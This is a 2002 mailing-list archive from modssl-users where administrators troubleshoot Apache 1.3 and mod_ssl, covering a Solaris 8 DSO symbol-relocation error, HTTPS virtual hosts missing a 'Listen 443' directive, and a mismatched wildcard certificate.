en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from post-office.ldc.usb.ve id SAA20731; Tue, 29 Jan 2002 18:45:31 +0100 (MET) Received: from jihaz (jihaz [159.90.10.224]) by post-office.ldc.usb.ve (Postfix) with ESMTP id 16E5EFB1F for ; Tue, 29 Jan 2002 13:18:14 -0400 (VET) Date: Tue, 29 Jan 2002 13:21:55 -0400 (GMT) From: LDC - Alan Mizrahi X-X-Sender: To: Subject: Problem installing mod_ssl on Solaris 8 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: LDC - Alan Mizrahi X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I have a problem installing apache-1.3.22 with mod_ssl 2.8.5 (DSO) on Solaris 8 (sparc). I get the following error starting apache: Syntax error on line 206 of /usr/local/apache-1.3.22/conf/httpd.conf: Cannot load /usr/local/apache-1.3.22/arch/libexec/libssl.so into server: ld.so.1: /usr/local/apache-1.3.22/arch/bin/httpd: fatal: relocation error: file /usr/local/apache-1.3.22/arch/libexec/libssl.so: symbol ap_user_id: referenced symbol not found /etc/init.d/httpd startssl: httpd could not be started I am have gcc-2.95.3 using GNU's ld and as (binutils-2.11). To install apache I did the following: - I installed mm-1.1.3 like this: ./configure --prefix=/usr/local/libmm-1.1.3 \ --exec-prefix=/usr/local/libmm-1.1.3/arch make make install - I installed openssl-0.9.6c like this: I modified the config script to force gcc instead of cc ./config --prefix=/usr/local/openssl-0.9.6c/arch \ --openssldir=/usr/local/openssl-0.9.6c/ssl no-idea \ no-threads shared -fPIC make make install - I installed apache-1.3.22 and mod_ssl-2.8.5 like this: tar -xzf apache_1.3.22.tar.gz tar -xzf mod_ssl-2.8.5-1.3.22.tar.gz cd mod_ssl-2.8.5-1.3.22 ./configure --with-apache=../apache_1.3.22 cd ../apache_1.3.22 EAPI_MM=SYSTEM SSL_BASE=SYSTEM ./configure \ --prefix=/usr/local/apache-1.3.22 \ --exec-prefix=/usr/local/apache-1.3.22/arch \ --enable-module=rewrite --enable-module=so \ --enable-shared=ssl --enable-module=ssl make make install Previous search of this error led me to use -fPIC when configuring openssl and using only static libraries of openssl, it didn't work either. When I run ldd -r libssl.so I find that many "ap_*" symbols that aren't found. Am I missing something here? Thanks for your help. Regards, Alan Mizrahi Universidad Simon Bolivar Laboratorio de Computacion alan@ldc.usb.ve ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 22:49:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16469; Tue, 29 Jan 2002 22:36:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id WAA16386; Tue, 29 Jan 2002 22:36:05 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id C4525BD2B; Tue, 29 Jan 2002 22:19:18 +0100 (CET) Date: Tue, 29 Jan 2002 22:19:18 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Problem installing mod_ssl on Solaris 8 Message-ID: <20020129211918.GD8430@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Jan 29, 2002 at 01:21:55PM -0400, LDC - Alan Mizrahi wrote: > > Hello, I have a problem installing apache-1.3.22 with mod_ssl 2.8.5 > (DSO) on Solaris 8 (sparc). > I get the following error starting apache: > Syntax error on line 206 of /usr/local/apache-1.3.22/conf/httpd.conf: > Cannot load /usr/local/apache-1.3.22/arch/libexec/libssl.so into server: > ld.so.1: /usr/local/apache-1.3.22/arch/bin/httpd: fatal: relocation > error: file /usr/local/apache-1.3.22/arch/libexec/libssl.so: symbol > ap_user_id: referenced symbol not found > /etc/init.d/httpd startssl: httpd could not be started > > I am have gcc-2.95.3 using GNU's ld and as (binutils-2.11). > To install apache I did the following: > > - I installed mm-1.1.3 like this: > ./configure --prefix=/usr/local/libmm-1.1.3 \ > --exec-prefix=/usr/local/libmm-1.1.3/arch You need to add --disable-shared to the configure command for mm - see the INSTALL file. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 22:49:41 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16935; Tue, 29 Jan 2002 22:41:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from post-office.ldc.usb.ve id WAA16676; Tue, 29 Jan 2002 22:38:52 +0100 (MET) Received: from jihaz (jihaz [159.90.10.224]) by post-office.ldc.usb.ve (Postfix) with ESMTP id 6A192FB07; Tue, 29 Jan 2002 17:10:43 -0400 (VET) Date: Tue, 29 Jan 2002 17:14:25 -0400 (GMT) From: LDC - Alan Mizrahi X-X-Sender: To: "R. DuFresne" Cc: Subject: Re: Problem installing mod_ssl on Solaris 8 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: LDC - Alan Mizrahi X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks, I read in the archives that Matt Goyer had a similar problem, but I think its not the same cause. His problem was that the runtime linker didn't find the dynamic openssl library, my problem is that the symbol "ap_user_id" referenced in libssl.so isn't found in any library. I think the ap_* symbols are defined in Apache core, so I don't know what's wrong. Can somebody help me solve this problem? Regards, Alan Mizrahi Universidad Simon Bolivar Laboratorio de Computacion alan@ldc.usb.ve On Tue, 29 Jan 2002, R. DuFresne wrote: > > try updateing ld.so to locate the lib, this was covered just this week in > the list. man ld.so.1 should point you in the proper direction. Also, > there was a sugestion one can create a sym link to the share lib paths > known to sunOS, from tthe special place folks like to place apache's > libssl.so file. Either one should work. > > Thanks, > > Ron DuFresne > > On Tue, 29 Jan 2002, LDC - Alan Mizrahi wrote: > > > > > Hello, I have a problem installing apache-1.3.22 with mod_ssl 2.8.5 > > (DSO) on Solaris 8 (sparc). > > I get the following error starting apache: > > Syntax error on line 206 of /usr/local/apache-1.3.22/conf/httpd.conf: > > Cannot load /usr/local/apache-1.3.22/arch/libexec/libssl.so into server: > > ld.so.1: /usr/local/apache-1.3.22/arch/bin/httpd: fatal: relocation > > error: file /usr/local/apache-1.3.22/arch/libexec/libssl.so: symbol > > ap_user_id: referenced symbol not found > > /etc/init.d/httpd startssl: httpd could not be started > > > > I am have gcc-2.95.3 using GNU's ld and as (binutils-2.11). > > To install apache I did the following: > > > > - I installed mm-1.1.3 like this: > > ./configure --prefix=/usr/local/libmm-1.1.3 \ > > --exec-prefix=/usr/local/libmm-1.1.3/arch > > make > > make install > > > > - I installed openssl-0.9.6c like this: > > I modified the config script to force gcc instead of cc > > ./config --prefix=/usr/local/openssl-0.9.6c/arch \ > > --openssldir=/usr/local/openssl-0.9.6c/ssl no-idea \ > > no-threads shared -fPIC > > make > > make install > > > > - I installed apache-1.3.22 and mod_ssl-2.8.5 like this: > > tar -xzf apache_1.3.22.tar.gz > > tar -xzf mod_ssl-2.8.5-1.3.22.tar.gz > > cd mod_ssl-2.8.5-1.3.22 > > ./configure --with-apache=../apache_1.3.22 > > cd ../apache_1.3.22 > > EAPI_MM=SYSTEM SSL_BASE=SYSTEM ./configure \ > > --prefix=/usr/local/apache-1.3.22 \ > > --exec-prefix=/usr/local/apache-1.3.22/arch \ > > --enable-module=rewrite --enable-module=so \ > > --enable-shared=ssl --enable-module=ssl > > make > > make install > > > > > > Previous search of this error led me to use -fPIC when configuring > > openssl and using only static libraries of openssl, it didn't work either. > > When I run ldd -r libssl.so I find that many "ap_*" symbols that aren't > > found. > > Am I missing something here? > > > > Thanks for your help. > > > > Regards, > > > > Alan Mizrahi > > Universidad Simon Bolivar > > Laboratorio de Computacion > > alan@ldc.usb.ve > > > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > -- > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > admin & senior security consultant: sysinfo.com > http://sysinfo.com > > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." > -- Johnny Hart > > testing, only testing, and damn good at it too! > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 00:42:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA28236; Wed, 30 Jan 2002 00:41:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id AAA28001; Wed, 30 Jan 2002 00:40:53 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA23761; Tue, 29 Jan 2002 15:17:13 -0500 Date: Tue, 29 Jan 2002 15:17:13 -0500 (EST) From: "R. DuFresne" To: LDC - Alan Mizrahi cc: modssl-users@modssl.org Subject: Re: Problem installing mod_ssl on Solaris 8 In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users try updateing ld.so to locate the lib, this was covered just this week in the list. man ld.so.1 should point you in the proper direction. Also, there was a sugestion one can create a sym link to the share lib paths known to sunOS, from tthe special place folks like to place apache's libssl.so file. Either one should work. Thanks, Ron DuFresne On Tue, 29 Jan 2002, LDC - Alan Mizrahi wrote: > > Hello, I have a problem installing apache-1.3.22 with mod_ssl 2.8.5 > (DSO) on Solaris 8 (sparc). > I get the following error starting apache: > Syntax error on line 206 of /usr/local/apache-1.3.22/conf/httpd.conf: > Cannot load /usr/local/apache-1.3.22/arch/libexec/libssl.so into server: > ld.so.1: /usr/local/apache-1.3.22/arch/bin/httpd: fatal: relocation > error: file /usr/local/apache-1.3.22/arch/libexec/libssl.so: symbol > ap_user_id: referenced symbol not found > /etc/init.d/httpd startssl: httpd could not be started > > I am have gcc-2.95.3 using GNU's ld and as (binutils-2.11). > To install apache I did the following: > > - I installed mm-1.1.3 like this: > ./configure --prefix=/usr/local/libmm-1.1.3 \ > --exec-prefix=/usr/local/libmm-1.1.3/arch > make > make install > > - I installed openssl-0.9.6c like this: > I modified the config script to force gcc instead of cc > ./config --prefix=/usr/local/openssl-0.9.6c/arch \ > --openssldir=/usr/local/openssl-0.9.6c/ssl no-idea \ > no-threads shared -fPIC > make > make install > > - I installed apache-1.3.22 and mod_ssl-2.8.5 like this: > tar -xzf apache_1.3.22.tar.gz > tar -xzf mod_ssl-2.8.5-1.3.22.tar.gz > cd mod_ssl-2.8.5-1.3.22 > ./configure --with-apache=../apache_1.3.22 > cd ../apache_1.3.22 > EAPI_MM=SYSTEM SSL_BASE=SYSTEM ./configure \ > --prefix=/usr/local/apache-1.3.22 \ > --exec-prefix=/usr/local/apache-1.3.22/arch \ > --enable-module=rewrite --enable-module=so \ > --enable-shared=ssl --enable-module=ssl > make > make install > > > Previous search of this error led me to use -fPIC when configuring > openssl and using only static libraries of openssl, it didn't work either. > When I run ldd -r libssl.so I find that many "ap_*" symbols that aren't > found. > Am I missing something here? > > Thanks for your help. > > Regards, > > Alan Mizrahi > Universidad Simon Bolivar > Laboratorio de Computacion > alan@ldc.usb.ve > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 01:03:32 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA29416; Wed, 30 Jan 2002 01:03:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from daedalus.andrew.net.au id BAA29315; Wed, 30 Jan 2002 01:02:08 +0100 (MET) Received: from daedalus.andrew.net.au (www-data@localhost [127.0.0.1]) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) with ESMTP id g0TMAtNB016595 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL) for ; Wed, 30 Jan 2002 08:10:55 +1000 Received: (from www-data@localhost) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) id g0TMAtMm016594 for modssl-users@modssl.org; Wed, 30 Jan 2002 08:10:55 +1000 Date: Wed, 30 Jan 2002 08:10:55 +1000 Message-Id: <200201292210.g0TMAtMm016594@daedalus.andrew.net.au> In-Reply-To: <20020129083415.H57092-100000@anger.verticalscope.com> References: <20020129083415.H57092-100000@anger.verticalscope.com> X-Mailer: JAWmail 0.9.17 X-Originating-IP: 144.137.137.79 From: Andrew Pollock To: Subject: Re: Wildcard certificates MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andrew Pollock X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 29.01.2002 at 23:36:53, "Julian C. Dunn" wrote: > On Tue, 29 Jan 2002, Andrew Pollock wrote: > > > No, it's two subdomains of the same domain. > > > > https://ops.suretyit.com.au/ > > https://sales.suretyit.com.au/ > > That's because you're trying to use a cert that has its CN as > *.singtech.com.au, and the site(s) you are using it on are > *.suretyit.com.au. Somebody shoot me. > - Julian > > -- > Julian C. Dunn, B.A.Sc > Senior Software Developer, VerticalScope Inc. > Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 > WWW: www.verticalscope.com > > "Windows NT encountered the following error: > The operation was completed successfully." > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 01:09:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA29632; Wed, 30 Jan 2002 01:08:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from saratoga.terran.net id BAA29575; Wed, 30 Jan 2002 01:07:33 +0100 (MET) Received: from localhost (saratoga.terran.net [127.0.0.1]) by saratoga.terran.net (Postfix) with ESMTP id EE0E14002 for ; Tue, 29 Jan 2002 12:36:38 -0800 (PST) Date: Tue, 29 Jan 2002 12:36:38 -0800 (PST) From: Aodhan H To: Subject: ssl no response Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aodhan H X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I am trying to get an ssl virtual site running. The http site works fine, but bringing up the https site gives me 'Could not reach remote server' error. I can find no log of the event, and no error code comes up. I used apachectl to check the syntax, and I get no errors. Looking around the web I have seen a variety of different configuration options, but none of them get me very far. Here is the virtual host directive I have, if people could point out what is wrong with it, I would appreciate it. ServerAdmin aodhan@domain.net DocumentRoot /www/domain.net/ssl ServerName server.domain.net ErrorLog logs/443error_log CustomLog logs/443access_log common ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/" Group users AuthName "ssl" AuthType Basic AuthUserFile auth/.htpasswd Require user aodhan SSLVerifyClient require SSLVerifyDepth 1 SSLRequireSSLA -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Aodhan H. - - - - - - - - - - - - - - - - Ad Astra per Aspera A Rough Road Leads To The Stars - - - - - - - - - - - - - - - - Freedom is something you have, not something you're given. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 01:14:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA00095; Wed, 30 Jan 2002 01:13:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id BAA00078; Wed, 30 Jan 2002 01:12:40 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 2F53E7E44; Tue, 29 Jan 2002 19:14:25 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 2CDA53EC9 for ; Tue, 29 Jan 2002 19:14:25 -0500 (EST) Date: Tue, 29 Jan 2002 19:14:25 -0500 (EST) From: "Julian C. Dunn" To: modssl-users@modssl.org Subject: Re: ssl no response In-Reply-To: Message-ID: <20020129191307.Y66342-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 29 Jan 2002, Aodhan H wrote: > Hello, I am trying to get an ssl virtual site running. The http site > works fine, but bringing up the https site gives me 'Could not reach > remote server' error. Do you have Listen 443 or even Listen x.x.x.x:443 somewhere in your server config? That is a common cause of "port 80 responding but port 443 not" problems. - Julian -- Julian C. Dunn, B.A.Sc Senior Software Developer, VerticalScope Inc. Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 WWW: www.verticalscope.com "Windows NT encountered the following error: The operation was completed successfully." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 01:19:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA00308; Wed, 30 Jan 2002 01:18:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id BAA00271; Wed, 30 Jan 2002 01:17:18 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16ViB9-0005Cd-00 for ; Tue, 29 Jan 2002 16:00:43 -0800 Date: Tue, 29 Jan 2002 16:00:43 -0800 To: modssl-users@modssl.org Subject: Re: ssl no response Message-ID: <20020130000043.GA19766@squaretrade.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I don't see SSLEngine On in your VirtualHost section. On Tue, Jan 29, 2002 at 12:36:38PM -0800, Aodhan H wrote: > > Hello, I am trying to get an ssl virtual site running. The http site > works fine, but bringing up the https site gives me 'Could not reach > remote server' error. > I can find no log of the event, and no error code comes up. > I used apachectl to check the syntax, and I get no errors. Looking around > the web I have seen a variety of different configuration options, but none > of them get me very far. > Here is the virtual host directive I have, if people could point out what > is wrong with it, I would appreciate it. > > > ServerAdmin aodhan@domain.net > DocumentRoot /www/domain.net/ssl > ServerName server.domain.net > ErrorLog logs/443error_log > CustomLog logs/443access_log common > ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/" > Group users > > AuthName "ssl" > AuthType Basic > AuthUserFile auth/.htpasswd > Require user aodhan > SSLVerifyClient require > SSLVerifyDepth 1 > SSLRequireSSLA > > > > > -- > > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > Aodhan H. > > - - - - - - - - - - - - - - - - > Ad Astra per Aspera > A Rough Road Leads To The Stars > - - - - - - - - - - - - - - - - > > Freedom is something you have, not something you're given. > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 02:12:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA02772; Wed, 30 Jan 2002 02:11:46 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from post-office.ldc.usb.ve id CAA02712; Wed, 30 Jan 2002 02:10:28 +0100 (MET) Received: from jihaz (jihaz [159.90.10.224]) by post-office.ldc.usb.ve (Postfix) with ESMTP id 7078AFAD2 for ; Tue, 29 Jan 2002 21:06:42 -0400 (VET) Date: Tue, 29 Jan 2002 21:10:25 -0400 (GMT) From: LDC - Alan Mizrahi X-X-Sender: To: Subject: Re: Problem installing mod_ssl on Solaris 8 In-Reply-To: <20020129211918.GD8430@marvin-lnx.int.tele.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: LDC - Alan Mizrahi X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I did everything again, without shared mm and without shared ssl, and id didn't work either. I also tried Ron's suggestion (I made a link in /usr/lib to libssl.so, also I tried with LD_LIBRARY_PATH). Any ideas? Thanks Alan Mizrahi Universidad Simon Bolivar Laboratorio de Computacion alan@ldc.usb.ve On Tue, 29 Jan 2002, Mads Toftum wrote: > On Tue, Jan 29, 2002 at 01:21:55PM -0400, LDC - Alan Mizrahi wrote: > > > > Hello, I have a problem installing apache-1.3.22 with mod_ssl 2.8.5 > > (DSO) on Solaris 8 (sparc). > > I get the following error starting apache: > > Syntax error on line 206 of /usr/local/apache-1.3.22/conf/httpd.conf: > > Cannot load /usr/local/apache-1.3.22/arch/libexec/libssl.so into server: > > ld.so.1: /usr/local/apache-1.3.22/arch/bin/httpd: fatal: relocation > > error: file /usr/local/apache-1.3.22/arch/libexec/libssl.so: symbol > > ap_user_id: referenced symbol not found > > /etc/init.d/httpd startssl: httpd could not be started > > > > I am have gcc-2.95.3 using GNU's ld and as (binutils-2.11). > > To install apache I did the following: > > > > - I installed mm-1.1.3 like this: > > ./configure --prefix=/usr/local/libmm-1.1.3 \ > > --exec-prefix=/usr/local/libmm-1.1.3/arch > > You need to add --disable-shared to the configure command for mm - see > the INSTALL file. > > vh > > Mads Toftum > -- > With a rubber duck, one's never alone. > -- "The Hitchhiker's Guide to the Galaxy" > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 07:21:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA17388; Wed, 30 Jan 2002 07:20:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id HAA17370; Wed, 30 Jan 2002 07:20:03 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id AE5DF4CE692; Wed, 30 Jan 2002 07:20:01 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0U6A7759093; Wed, 30 Jan 2002 07:10:07 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zircon.bhl.com.au id BAA00191; Wed, 30 Jan 2002 01:15:36 +0100 (MET) Received: by ZIRCON with Internet Mail Service (5.5.2653.19) id ; Wed, 30 Jan 2002 08:30:33 +1100 Message-ID: <31A657F37655D111B31300A0C955187501C21C1B@ZIRCON> From: David Hsu To: "'modssl-users@modssl.org'" Subject: RE: Cannot seem to bind to port 443? Date: Wed, 30 Jan 2002 08:30:31 +1100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Hsu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All, It was a simple problem indeed! I did not explicitly Listen on port 443 (as suggested below). For some (stupid) reason I thought apahce would default to port 80 and automagically pick up port 443 from the config (which is easy to do I assume from the readout of httpd -S). Anyway I did not have any Listen directives and I've since put in Listen 443 Listen 80 and it works now. Thank you all for the suggestions etc. Cheers, David Hsu -----Original Message----- From: Andy Osborne [mailto:andy@sift.co.uk] Sent: Tuesday, 29 January 2002 9:40 PM To: modssl-users@modssl.org Subject: Re: Cannot seem to bind to port 443? David Hsu wrote: > Hi All, > [snip] > > > ServerName intertest.anstat.com.au > > LogLevel debug > ErrorLog logs/anstat_com_ssl-error > CustomLog logs/anstat_com_ssl-access common > > SSLEngine On > SSLCertificateFile /etc/httpd/conf/intertest.anstat.com.au.crt > SSLCertificateKeyFile /etc/httpd/conf/intertest.anstat.com.au.key > > ======================= > > After apache is started, there's absolutely no error message anywhere. > However httpd does not seem to bind to port 443 at all? (checked using > netstat -anp | grep "443") There is NO firewall installed on this server. > Connecting to https via browser fails obviously. telnet localhost 443 also > fails. Try... Listen 192.168.221.63:443 ServerName intertest.anstat.com.au .... etc Andy -- Andy Osborne **************** "Vertical B2B Communities" Senior Internet Engineer Sift Group Ltd. 100 Victoria Street, Bristol BS1 6HZ tel:+44 117 915 9600 fax:+44 117 915 9630 http://www.sift.co.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 07:21:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA17394; Wed, 30 Jan 2002 07:20:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id HAA17373; Wed, 30 Jan 2002 07:20:03 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id BC95F4CE699; Wed, 30 Jan 2002 07:20:01 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0U6A9W59099; Wed, 30 Jan 2002 07:10:09 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zircon.bhl.com.au id BAA00189; Wed, 30 Jan 2002 01:15:32 +0100 (MET) Received: by ZIRCON with Internet Mail Service (5.5.2653.19) id ; Wed, 30 Jan 2002 11:14:31 +1100 Message-ID: <31A657F37655D111B31300A0C955187501C21C22@ZIRCON> From: David Hsu To: "'modssl-users@modssl.org'" Subject: RE: ssl no response Date: Wed, 30 Jan 2002 11:14:31 +1100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Hsu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This sounds like the problem I send out yesterday! Have you ensure you have Listen 443 in your httpd.conf? apache does not pick it up automagically from Cheers, David Hsu -----Original Message----- From: Aodhan H [mailto:aodhan@terran.net] Sent: Wednesday, 30 January 2002 7:37 AM To: modssl-users@modssl.org Subject: ssl no response Hello, I am trying to get an ssl virtual site running. The http site works fine, but bringing up the https site gives me 'Could not reach remote server' error. I can find no log of the event, and no error code comes up. I used apachectl to check the syntax, and I get no errors. Looking around the web I have seen a variety of different configuration options, but none of them get me very far. Here is the virtual host directive I have, if people could point out what is wrong with it, I would appreciate it. ServerAdmin 